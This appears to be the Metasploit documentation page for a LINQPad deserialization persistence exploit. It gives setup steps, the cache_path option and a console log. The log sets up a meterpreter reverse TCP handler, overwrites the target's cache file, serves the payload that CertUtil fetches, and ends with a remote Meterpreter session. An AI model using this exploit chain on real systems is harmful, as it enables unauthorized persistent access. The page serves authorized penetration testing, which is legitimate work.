adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1e4527d8338b4f431cdc8011c052d3744e29d7ed
metasploit-gs/documentation/modules/exploit/windows/persistence/linqpad_deserialization.md
T

54 lines
2.2 KiB
Markdown
Raw Blame History

## Vulnerable Application
LINQPad is a scratchpad for .NET programming.
Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting.
Application can be downloaded from [here](https://www.linqpad.net/).
## Verification Steps
1. Install the application
2. Start msfconsole
3. Get session
4. Run: `use windows/local/linqpad_deserialization`
5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
6. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
7. Run exploit
## Options
### cache\_path
The parameter sets path for folder, where vulnerable cache file is present.
This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.
## Scenarios
```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.3.7
msf exploit(multi/handler) > set LPORT 4545
msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/linqpad_deserialization_persistence) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /LCG8z8xZZXJnz_uKNIZRPw
[*] Started reverse TCP handler on 192.168.3.7:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. LINPad and vulnerable cache file present, target possibly exploitable
[*] Create deserialization payload
[*] Saving the original content
[*] Saved at: /home/ms/.msf4/loot/20251027153340_default_10.5.132.148_CUsersmsfuser_949460.txt
[*] Overwriting file
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_1909_BE09_20251027.3341/WIN10_1909_BE09_20251027.3341.rc
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.148
[*] Meterpreter session 2 opened (192.168.3.7:4545 -> 10.5.132.148:50045) at 2025-10-27 15:33:53 +0100
```
Reference in New Issue View Git Blame Copy Permalink